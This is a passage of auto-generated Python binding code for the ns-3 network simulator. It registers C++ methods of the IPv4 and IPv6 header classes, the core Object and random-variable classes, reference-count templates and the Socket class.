## ipv4-header.h (module 'internet'): ns3::TypeId ns3::Ipv4Header::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetPayloadSize() const [member function]
cls.add_method('GetPayloadSize',
'uint16_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetProtocol() const [member function]
cls.add_method('GetProtocol',
'uint8_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetSource() const [member function]
cls.add_method('GetSource',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTos() const [member function]
cls.add_method('GetTos',
'uint8_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTtl() const [member function]
cls.add_method('GetTtl',
'uint8_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): static ns3::TypeId ns3::Ipv4Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsChecksumOk() const [member function]
cls.add_method('IsChecksumOk',
'bool',
[],
is_const=True)
## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsDontFragment() const [member function]
cls.add_method('IsDontFragment',
'bool',
[],
is_const=True)
## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsLastFragment() const [member function]
cls.add_method('IsLastFragment',
'bool',
[],
is_const=True)
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDestination(ns3::Ipv4Address destination) [member function]
cls.add_method('SetDestination',
'void',
[param('ns3::Ipv4Address', 'destination')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDontFragment() [member function]
cls.add_method('SetDontFragment',
'void',
[])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDscp(ns3::Ipv4Header::DscpType dscp) [member function]
cls.add_method('SetDscp',
'void',
[param('ns3::Ipv4Header::DscpType', 'dscp')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetEcn(ns3::Ipv4Header::EcnType ecn) [member function]
cls.add_method('SetEcn',
'void',
[param('ns3::Ipv4Header::EcnType', 'ecn')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetFragmentOffset(uint16_t offsetBytes) [member function]
cls.add_method('SetFragmentOffset',
'void',
[param('uint16_t', 'offsetBytes')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetIdentification(uint16_t identification) [member function]
cls.add_method('SetIdentification',
'void',
[param('uint16_t', 'identification')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetLastFragment() [member function]
cls.add_method('SetLastFragment',
'void',
[])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMayFragment() [member function]
cls.add_method('SetMayFragment',
'void',
[])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMoreFragments() [member function]
cls.add_method('SetMoreFragments',
'void',
[])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetPayloadSize(uint16_t size) [member function]
cls.add_method('SetPayloadSize',
'void',
[param('uint16_t', 'size')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetProtocol(uint8_t num) [member function]
cls.add_method('SetProtocol',
'void',
[param('uint8_t', 'num')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetSource(ns3::Ipv4Address source) [member function]
cls.add_method('SetSource',
'void',
[param('ns3::Ipv4Address', 'source')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTos(uint8_t tos) [member function]
cls.add_method('SetTos',
'void',
[param('uint8_t', 'tos')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTtl(uint8_t ttl) [member function]
cls.add_method('SetTtl',
'void',
[param('uint8_t', 'ttl')])
return
def register_Ns3Ipv6Header_methods(root_module, cls):
## ipv6-header.h (module 'internet'): ns3::Ipv6Header::Ipv6Header(ns3::Ipv6Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Header const &', 'arg0')])
## ipv6-header.h (module 'internet'): ns3::Ipv6Header::Ipv6Header() [constructor]
cls.add_constructor([])
## ipv6-header.h (module 'internet'): uint32_t ns3::Ipv6Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## ipv6-header.h (module 'internet'): ns3::Ipv6Address ns3::Ipv6Header::GetDestinationAddress() const [member function]
cls.add_method('GetDestinationAddress',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-header.h (module 'internet'): uint32_t ns3::Ipv6Header::GetFlowLabel() const [member function]
cls.add_method('GetFlowLabel',
'uint32_t',
[],
is_const=True)
## ipv6-header.h (module 'internet'): uint8_t ns3::Ipv6Header::GetHopLimit() const [member function]
cls.add_method('GetHopLimit',
'uint8_t',
[],
is_const=True)
## ipv6-header.h (module 'internet'): ns3::TypeId ns3::Ipv6Header::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## ipv6-header.h (module 'internet'): uint8_t ns3::Ipv6Header::GetNextHeader() const [member function]
cls.add_method('GetNextHeader',
'uint8_t',
[],
is_const=True)
## ipv6-header.h (module 'internet'): uint16_t ns3::Ipv6Header::GetPayloadLength() const [member function]
cls.add_method('GetPayloadLength',
'uint16_t',
[],
is_const=True)
## ipv6-header.h (module 'internet'): uint32_t ns3::Ipv6Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ipv6-header.h (module 'internet'): ns3::Ipv6Address ns3::Ipv6Header::GetSourceAddress() const [member function]
cls.add_method('GetSourceAddress',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-header.h (module 'internet'): uint8_t ns3::Ipv6Header::GetTrafficClass() const [member function]
cls.add_method('GetTrafficClass',
'uint8_t',
[],
is_const=True)
## ipv6-header.h (module 'internet'): static ns3::TypeId ns3::Ipv6Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::SetDestinationAddress(ns3::Ipv6Address dst) [member function]
cls.add_method('SetDestinationAddress',
'void',
[param('ns3::Ipv6Address', 'dst')])
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::SetFlowLabel(uint32_t flow) [member function]
cls.add_method('SetFlowLabel',
'void',
[param('uint32_t', 'flow')])
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::SetHopLimit(uint8_t limit) [member function]
cls.add_method('SetHopLimit',
'void',
[param('uint8_t', 'limit')])
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::SetNextHeader(uint8_t next) [member function]
cls.add_method('SetNextHeader',
'void',
[param('uint8_t', 'next')])
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::SetPayloadLength(uint16_t len) [member function]
cls.add_method('SetPayloadLength',
'void',
[param('uint16_t', 'len')])
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::SetSourceAddress(ns3::Ipv6Address src) [member function]
cls.add_method('SetSourceAddress',
'void',
[param('ns3::Ipv6Address', 'src')])
## ipv6-header.h (module 'internet'): void ns3::Ipv6Header::SetTrafficClass(uint8_t traffic) [member function]
cls.add_method('SetTrafficClass',
'void',
[param('uint8_t', 'traffic')])
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Initialize() [member function]
cls.add_method('Initialize',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoInitialize() [member function]
cls.add_method('DoInitialize',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
def register_Ns3RandomVariableStream_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::RandomVariableStream::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::RandomVariableStream::RandomVariableStream() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetStream(int64_t stream) [member function]
cls.add_method('SetStream',
'void',
[param('int64_t', 'stream')])
## random-variable-stream.h (module 'core'): int64_t ns3::RandomVariableStream::GetStream() const [member function]
cls.add_method('GetStream',
'int64_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetAntithetic(bool isAntithetic) [member function]
cls.add_method('SetAntithetic',
'void',
[param('bool', 'isAntithetic')])
## random-variable-stream.h (module 'core'): bool ns3::RandomVariableStream::IsAntithetic() const [member function]
cls.add_method('IsAntithetic',
'bool',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::RandomVariableStream::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::RandomVariableStream::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_pure_virtual=True, is_virtual=True)
## random-variable-stream.h (module 'core'): ns3::RngStream * ns3::RandomVariableStream::Peek() const [member function]
cls.add_method('Peek',
'ns3::RngStream *',
[],
is_const=True, visibility='protected')
return
def register_Ns3SequentialRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::SequentialRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable::SequentialRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): ns3::Ptr<ns3::RandomVariableStream> ns3::SequentialRandomVariable::GetIncrement() const [member function]
cls.add_method('GetIncrement',
'ns3::Ptr< ns3::RandomVariableStream >',
[],
is_const=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetConsecutive() const [member function]
cls.add_method('GetConsecutive',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount(ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4MulticastRoute > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4Route > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount(ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter< ns3::OutputStreamWrapper > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Socket_methods(root_module, cls):
## socket.h (module 'network'): ns3::Socket::Socket(ns3::Socket const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Socket const &', 'arg0')])
## socket.h (module 'network'): ns3::Socket::Socket() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): int ns3::Socket::Bind(ns3::Address const & address) [member function]
cls.add_method('Bind',
'int',
[param('ns3::Address const &', 'address')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Bind() [member function]
cls.add_method('Bind',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Bind6() [member function]
cls.add_method('Bind6',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::BindToNetDevice(ns3::Ptr<ns3::NetDevice> netdevice) [member function]
cls.add_method('BindToNetDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'netdevice')],
is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Close() [member function]
cls.add_method('Close',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Connect(ns3::Address const & address) [member function]
cls.add_method('Connect',
'int',
[param('ns3::Address const &', 'address')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): static ns3::Ptr<ns3::Socket> ns3::Socket::CreateSocket(ns3::Ptr<ns3::Node> node, ns3::TypeId tid) [member function]
cls.add_method('CreateSocket',
'ns3::Ptr< ns3::Socket >',
[param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::TypeId', 'tid')],
is_static=True)
## socket.h (module 'network'): bool ns3::Socket::GetAllowBroadcast() const [member function]
cls.add_method('GetAllowBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Socket::GetBoundNetDevice() [member function]
cls.add_method('GetBoundNetDevice',
'ns3::Ptr< ns3::NetDevice >',
[])
## socket.h (module 'network'): ns3::Socket::SocketErrno ns3::Socket::GetErrno() const [member function]
cls.add_method('GetErrno',
'ns3::Socket::SocketErrno',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::Socket::GetIpTos() const [member function]
cls.add_method('GetIpTos',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): uint8_t ns3::Socket::GetIpTtl() const [member function]
cls.add_method('GetIpTtl',
'uint8_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::Socket::GetIpv6HopLimit() const [member function]
cls.add_method('GetIpv6HopLimit',
'uint8_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::Socket::GetIpv6Tclass() const [member function]
cls.add_method('GetIpv6Tclass',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Socket::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::Socket::GetRxAvailable() const [member function]
cls.add_method('GetRxAvailable',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::GetSockName(ns3::Address & address) const [member function]
